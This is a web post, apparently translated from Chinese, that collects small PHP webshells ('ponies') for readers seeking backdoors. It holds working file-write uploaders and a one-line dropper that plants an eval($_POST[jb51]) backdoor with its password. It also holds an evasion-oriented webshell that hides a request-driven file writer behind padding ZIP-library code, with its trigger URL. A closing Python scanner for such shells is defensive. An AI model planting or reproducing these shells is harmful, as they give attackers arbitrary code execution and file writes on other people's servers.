Super small PHP pony summary (convenient for friends looking for backdoors)

WBOY
2016-07-21 15:19:24

Author: spider
I also have a super small PHP pony

The code is as follows:

<?php
header("content-Type: text/html; charset=gb2312");
if(get_magic_quotes_gpc()) foreach($_POST as $k=>$v) $_POST[$k] = stripslashes($v);
?>

Save file name:

<?php
if(isset($_POST['file']))
{
$fp = @fopen($_POST['file'],'wb');
echo @fwrite($fp,$_POST['text']) ? 'Save successfully!' : 'Save failed!';
@fclose($fp);
}
?>

I was bored and watched some PHP tutorials last night, and found that PHP is really quite powerful! By the way, I wrote a PHP pony.
The code is pasted directly below.
The code is as follows:


By: SinCoder</title>
<font color=red size=6>php pony By:SinCoder</br></font>
<?
echo "</br>The path of this program: ".__FILE__ .
"</br>Server operating system: ".PHP_OS.
"</br>Server IP address: ".gethostbyname($_SERVER["SERVER_NAME"]).
"</br>PHP version: ".PHP_VERSION;
?>
<form action = <? echo strrchr(__FILE__,"\\"); ?> method="post">
Data to be submitted: </br>
<textarea type="text" name="data" rows="10" cols="30">
</textarea>
</br>
Saving path:<input type="text" name="dir" />
</br>
<input type="submit" value="Submit" />
</form>
</html>
<?
if(!(isset($_POST["data"]) && isset($_POST["dir"])))
  exit();
if(strlen($_POST["data"])>0 && strlen($_POST["dir"])>0)
{
  $p_File=fopen($_POST["dir"],"a");
  if(!$p_File)
    echo "Writing failed! Please try changing the directory!";
  else
    echo "Ok!!";
  fputs($p_File,$_POST["data"]);
  fclose($p_File);
}
else
  echo "Please fill in the data completely!";

<?fputs(fopen(jb51.php,w),<?eval($_POST[jb51]);?>)?>

After this is accessed, jb51.php is generated in the current directory with the content <?eval($_POST[jb51]);?> and the password is jb51.

The latest anti-kill PHP horse

The code is as follows:

<?php
class zip
{
  var $datasec, $ctrl_dir = array();
  var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
  var $old_offset = 0; var $dirs = Array(".");
  function get_List($zip_name)
  {
    $ret = '';
    $zip = @fopen($zip_name, 'rb');
    if(!$zip) return(0);
    $centd = $this->ReadCentralDir($zip,$zip_name);
    @rewind($zip);
    @fseek($zip, $centd['offset']);
    for ($i=0; $i<$centd['entries']; $i++)
    {
      $header = $this->ReadCentralFileHeaders($zip);
      $header['index'] = $i;$info['filename'] = $header['filename'];
      $info['stored_filename'] = $header['stored_filename'];
      $info['size'] = $header['size'];$info['compressed_size']=$header['compressed_size'];
      $info['crc'] = strtoupper(dechex( $header['crc'] ));
      $info['mtime'] = $header['mtime']; $info['comment'] = $header['comment'];
      $info['folder'] = ($header['external']==0x41FF0010||$header['external']==16)?1:0;
      $info['index'] = $header['index'];$info['status'] = $header['status'];
      $ret[]=$info; unset($header);
    }
    return $ret;
  }
  function Add($files,$compact)
  {
    if(!is_array($files[0])) $files=Array($files);
    for($i=0;$files[$i];$i++){
      $fn = $files[$i];
      if(!in_Array(dirname($fn[0]),$this->dirs))
        $this->add_Dir(dirname($fn[0]));
      if(basename($fn[0]))
        $ret[basename($fn[0])]=$this->add_File($fn[1],$fn[0],$compact);
    }
    return $ret;
  }
  function get_file()
  {
    $data = implode('', $this -> datasec);
    $ctrldir = implode('', $this -> ctrl_dir);
    return $data . $ctrldir . $this -> eof_ctrl_dir .
      pack('v', sizeof($this -> ctrl_dir)).pack('v', sizeof($this -> ctrl_dir)).
      pack('V', strlen($ctrldir)) . pack('V', strlen($data)) . "\x00\x00";
  }
  function add_dir($name)
  {
    $name = str_replace("\\", "/", $name);
    $fr = "\x50\x4b\x03\x04\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00";
    $fr .= pack("V",0).pack("V",0).pack("V",0).pack("v", strlen($name) );
    $fr .= pack("v", 0 ).$name.pack("V", 0).pack("V", 0).pack("V", 0);
    $this -> datasec[] = $fr;
    $new_offset = strlen(implode("", $this->datasec));
    $cdrec = "\x50\x4b\x01\x02\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00";
    $cdrec .= pack("V",0).pack("V",0).pack("V",0).pack("v", strlen($name) );
    $cdrec .= pack("v", 0 ).pack("v", 0 ).pack("v", 0 ).pack("v", 0 );
    $ext = "\xff\xff\xff\xff";
    $cdrec .= pack("V", 16 ).pack("V", $this -> old_offset ).$name;
    $this -> ctrl_dir[] = $cdrec;
    $this -> old_offset = $new_offset;
    $this -> dirs[] = $name;
  }
  function add_File($data, $name, $compact = 1)
  {
    $name = str_replace('\\', '/', $name);
    $dtime = dechex($this->DosTime());
    $hexdtime = '\x' . $dtime[6] . $dtime[7].'\x'.$dtime[4] . $dtime[5]
      . '\x' . $dtime[2] . $dtime[3].'\x'.$dtime[0].$dtime[1];
    eval('$hexdtime = "' . $hexdtime . '";');
    if($compact)
      $fr = "\x50\x4b\x03\x04\x14\x00\x00\x00\x08\x00".$hexdtime;
    else $fr = "\x50\x4b\x03\x04\x0a\x00\x00\x00\x00\x00".$hexdtime;
    $unc_len = strlen($data); $crc = crc32($data);
    if($compact){
      $zdata = gzcompress($data); $c_len = strlen($zdata);
      $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
    }else{
      $zdata = $data;
    }
    $c_len=strlen($zdata);
    $fr .= pack('V', $crc).pack('V', $c_len).pack('V', $unc_len);
    $fr .= pack('v', strlen($name)).pack('v', 0).$name.$zdata;
    $fr .= pack('V', $crc).pack('V', $c_len).pack('V', $unc_len);
    $this -> datasec[] = $fr;
    $new_offset = strlen(implode('', $this->datasec));
    if($compact)
      $cdrec = "\x50\x4b\x01\x02\x00\x00\x14\x00\x00\x00\x08\x00";
    else $cdrec = "\x50\x4b\x01\x02\x14\x00\x0a\x00\x00\x00\x00\x00";
    $cdrec .= $hexdtime.pack('V', $crc).pack('V', $c_len).pack('V', $unc_len);
    $cdrec .= pack('v', strlen($name) ).pack('v', 0 ).pack('v', 0 );
    $cdrec .= pack('v', 0 ).pack('v', 0 ).pack('V', 32 );
    $cdrec .= pack('V', $this -> old_offset );
    $this -> old_offset = $new_offset;
    $cdrec .= $name;
    $this -> ctrl_dir[] = $cdrec;
    return true;
  }
  function DosTime() {
    $timearray = getdate();
    if ($timearray['year'] < 1980) {
      $timearray['year'] = 1980; $timearray['mon'] = 1;
      $timearray['mday'] = 1; $timearray['hours'] = 0;
      $timearray['minutes'] = 0; $timearray['seconds'] = 0;
    }
    return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) | ($timearray['hours'] << 11) |
      ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
  }
  //Decompress the entire compressed package
  //Using Extract directly will cause path problems. This function first obtains the file information from the list and creates all directories before running Extract
  function ExtractAll ( $zn, $to)
  {
    if(substr($to,-1)!="/") $to .= "/";
    $files = $this->get_List($zn);
    $cn = count($files);
    if(is_array($files))
    {
      for($i=0;$i<$cn;$i++)
      {
        if($files[$i]['folder']==1){
          @mkdir($to.$files[$i]['filename'],$GLOBALS['cfg_dir_purview']);
          @chmod($to.$files[$i]['filename'],$GLOBALS['cfg_dir_purview']);
        }
      }
    }
    $this->Extract ($zn,$to);
  }
  function Extract ( $zn, $to, $index = Array(-1) )
  {
    $ok = 0; $zip = @fopen($zn,'rb');
    if(!$zip) return(-1);
    $cdir = $this->ReadCentralDir($zip,$zn);
    $pos_entry = $cdir['offset'];
    if(!is_array($index)){ $index = array($index); }
    for($i=0; isset($index[$i]);$i++){
      if(intval($index[$i])!=$index[$i]||$index[$i]>$cdir['entries'])
        return(-1);
    }
    for ($i=0; $i<$cdir['entries']; $i++)
    {
      @fseek($zip, $pos_entry);
      $header = $this->ReadCentralFileHeaders($zip);
      $header['index'] = $i; $pos_entry = ftell($zip);
      @rewind($zip); fseek($zip, $header['offset']);
      if(in_array("-1",$index)||in_array($i,$index))
        $stat[$header['filename']]=$this->ExtractFile($header, $to, $zip);
    }
    fclose($zip);
    return $stat;
  }
  function ReadFileHeader($zip)
  {
    $binary_data = fread($zip, 30);
    $data = unpack('vchk/vid/vversion/vflag/vcompression/vmtime/vmdate/Vcrc/Vcompressed_size/Vsize/vfilename_len/vextra_len', $binary_data);
    $header['filename'] = fread($zip, $data['filename_len']);
    if ($data['extra_len'] != 0) {
      $header['extra'] = fread($zip, $data['extra_len']);
    } else { $header['extra'] = ''; }
    $header['compression'] = $data['compression'];$header['size'] = $data['size'];
    $header['compressed_size'] = $data['compressed_size'];
    $header['crc'] = $data['crc']; $header['flag'] = $data['flag'];
    $header['mdate'] = $data['mdate'];$header['mtime'] = $data['mtime'];
    if ($header['mdate'] && $header['mtime']){
      $hour=($header['mtime']&0xF800)>>11;$minute=($header['mtime']&0x07E0)>>5;
      $seconde=($header['mtime']&0x001F)*2;$year=(($header['mdate']&0xFE00)>>9)+1980;
      $month=($header['mdate']&0x01E0)>>5;$day=$header['mdate']&0x001F;
      $header['mtime'] = mktime($hour, $minute, $seconde, $month, $day, $year);
    }else{$header['mtime'] = time();}
    $header['stored_filename'] = $header['filename'];
    $header['status'] = "ok";
    return $header;
  }
  function ReadCentralFileHeaders($zip){
    $binary_data = fread($zip, 46);
    $header = unpack('vchkid/vid/vversion/vversion_extracted/vflag/vcompression/vmtime/vmdate/Vcrc/Vcompressed_size/Vsize/vfilename_len/vextra_len/vcomment_len/vdisk/vinternal/Vexternal/Voffset', $binary_data);
    if ($header['filename_len'] != 0)
      $header['filename'] = fread($zip,$header['filename_len']);
    else $header['filename'] = '';
    if ($header['extra_len'] != 0)
      $header['extra'] = fread($zip, $header['extra_len']);
    else $header['extra'] = '';
    if ($header['comment_len'] != 0)
      $header['comment'] = fread($zip, $header['comment_len']);
    else $header['comment'] = '';
    if ($header['mdate'] && $header['mtime'])
    {
      $hour = ($header['mtime'] & 0xF800) >> 11;
      $minute = ($header['mtime'] & 0x07E0) >> 5;
      $seconde = ($header['mtime'] & 0x001F)*2;
      $year = (($header['mdate'] & 0xFE00) >> 9) + 1980;
      $month = ($header['mdate'] & 0x01E0) >> 5;
      $day = $header['mdate'] & 0x001F;
      $header['mtime'] = mktime($hour, $minute, $seconde, $month, $day, $year);
    } else {
      $header['mtime'] = time();
    }
    $header['stored_filename'] = $header['filename'];
    $header['status'] = 'ok';
    if (substr($header['filename'], -1) == '/')
      $header['external'] = 0x41FF0010;
    return $header;
  }
  function ReadCentralDir($zip,$zip_name)
  {
    $size = filesize($zip_name);
    if ($size < 277) $maximum_size = $size;
    else $maximum_size=277;
    @fseek($zip, $size-$maximum_size);
    $pos = ftell($zip); $bytes = 0x00000000;
    while ($pos < $size)
    {
      $byte = @fread($zip, 1); $bytes=($bytes << 8) | Ord($byte);
      if ($bytes == 0x504b0506){ $pos++; break; } $pos++;
    }
    $data = @unpack('vdisk/vdisk_start/vdisk_entries/ventries/Vsize/Voffset/vcomment_size',fread($zip, 18));
    if ($data['comment_size'] != 0) $centd['comment'] = fread($zip, $data['comment_size']);
    else $centd['comment'] = ''; $centd['entries'] = $data['entries'];
    $centd['disk_entries'] = $data['disk_entries'];
    $centd['offset'] = $data['offset'];$centd['disk_start'] = $data['disk_start'];
    $centd['size'] = $data['size']; $centd['disk'] = $data['disk'];
    return $centd;
  }
  function ExtractFile($header,$to,$zip)
  {
    $header = $this->readfileheader($zip);
    $header['external'] = (!isset($header['external']) ? 0 : $header['external']);
    if(substr($to,-1)!="/") $to.="/";
    if(!@is_dir($to)) @mkdir($to,$GLOBALS['cfg_dir_purview']);
    if (!($header['external']==0x41FF0010)&&!($header['external']==16))
    {
      if ($header['compression']==0)
      {
        $fp = @fopen($to.$header['filename'], 'wb');
        if(!$fp) return(-1);
        $size = $header['compressed_size'];
        while ($size != 0)
        {
          $read_size = ($size < 2048 ? $size : 2048);
          $buffer = fread($zip, $read_size);
          $binary_data = pack('a'.$read_size, $buffer);
          @fwrite($fp, $binary_data, $read_size);
          $size -= $read_size;
        }
        fclose($fp);
        touch($to.$header['filename'], $header['mtime']);
      }else{
        $fp = @fopen($to.$header['filename'].'.gz','wb');
        if(!$fp) return(-1);
        $binary_data = pack('va1a1Va1a1', 0x8b1f, Chr($header['compression']),
          Chr(0x00), time(), Chr(0x00), Chr(3));
        fwrite($fp, $binary_data, 10);
        $size = $header['compressed_size'];
        while ($size != 0)
        {
          $read_size = ($size < 1024 ? $size : 1024);
          $buffer = fread($zip, $read_size);
          $binary_data = pack('a'.$read_size, $buffer);
          @fwrite($fp, $binary_data, $read_size);
          $size -= $read_size;
        }
        $binary_data = pack('VV', $header['crc'], $header['size']);
        fwrite($fp, $binary_data,8); fclose($fp);
        $gzp = @gzopen($to.$header['filename'].'.gz','rb') or die("Cette archive est compress");
        if(!$gzp) return(-2);
        $fp = @fopen($to.$header['filename'],'wb');
        if(!$fp) return(-1);
        $size = $header['size'];
        while ($size != 0)
        {
          $read_size = ($size < 2048 ? $size : 2048);
          $buffer = gzread($gzp, $read_size);
          $binary_data = pack('a'.$read_size, $buffer);
          @fwrite($fp, $binary_data, $read_size);
          $size -= $read_size;
        }
        fclose($fp); gzclose($gzp);
        touch($to.$header['filename'], $header['mtime']);
        @unlink($to.$header['filename'].'.gz');
      }}
    return true;
  }
}
// Everything above is ordinary ZIP-handling code. The block below is the backdoor:
// with ?zxzgcn=login it writes the POSTed "text" to the POSTed "file" path.
if($_GET['zxzgcn']=='login'){
header("content-Type: text/html; charset=gb2312");
if(get_magic_quotes_gpc()) foreach($_POST as $k=>$v) $_POST[$k] = stripslashes($v);
?>
<form method="POST">
save to: <input type="text" name="file" size="60" value="<? echo str_replace('\\','/',__FILE__) ?>">
<br><br>
<textarea name="text" COLS="70" ROWS="18" ></textarea>
<br><br>
<input type="submit" name="submit" value="save">
<form>
<?php
if(isset($_POST['file']))
{
$fp = @fopen($_POST['file'],'wb');
echo @fwrite($fp,$_POST['text']) ? 'succed!' : 'faled!';
@fclose($fp);
}
}
?>

Usage: xxx.php?zxzgcn=login
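A detection sketch for the backdoors collected on this page, added here as an example (it is not code from the original posts): it reports every file-writing or code-executing PHP call whose arguments contain request data, which catches the uploaders above while ignoring the harmless `eval` and `fopen` calls inside the padding ZIP class. The function names and the sample strings are constructed for illustration.

```python
import re

# Request-controlled PHP superglobals (data the remote client chooses).
SOURCE = re.compile(r"\$_(?:POST|GET|REQUEST|COOKIE)\b")
# Calls that write files or execute code.
SINK = re.compile(r"\b(eval|assert|fopen|fwrite|fputs|file_put_contents)\s*\(", re.I)

def call_args(src, open_idx):
    """Text between the '(' at open_idx and its matching ')', skipping quoted strings."""
    depth, quote, i = 0, None, open_idx
    while i < len(src):
        c = src[i]
        if quote:
            if c == "\\":
                i += 1                      # skip the escaped character
            elif c == quote:
                quote = None
        elif c in "'\"":
            quote = c
        elif c == "(":
            depth += 1
        elif c == ")":
            depth -= 1
            if depth == 0:
                return src[open_idx + 1:i]
        i += 1
    return src[open_idx + 1:]               # unbalanced: scan to end of file

def scan_php(src):
    """Return (line, sink) for every sink call whose arguments mention request data.
    String literals in the arguments are scanned too, so a dropper that writes
    request-evaluating code to disk is reported as well."""
    hits = []
    for m in SINK.finditer(src):
        if SOURCE.search(call_args(src, m.end() - 1)):
            hits.append((src.count("\n", 0, m.start()) + 1, m.group(1).lower()))
    return hits

# Constructed samples, modelled on the snippets on this page.
UPLOADER = r"""<?php
if(isset($_POST['file']))
{
$fp = @fopen($_POST[ 'file'],'wb');
echo @fwrite($fp,$_POST['text']) ? 'ok' : 'fail';
}
"""
# Benign-looking library code with a request-driven write appended after it.
PADDED = r"""<?php
class zip {
function add_File($data, $name) {
eval('$hexdtime = "' . $hexdtime . '";');
$zip = @fopen($zip_name, 'rb');
}
}
if($_GET['zxzgcn']=='login'){
$fp = @fopen($_POST['file'],'wb');
}
"""

if __name__ == "__main__":
    for name, src in (("uploader", UPLOADER), ("padded", PADDED)):
        print(name, scan_php(src))
```

A match is a lead for manual review, not a verdict: legitimate upload handlers also pass request data to these functions, and the scan does not follow request data through intermediate variables.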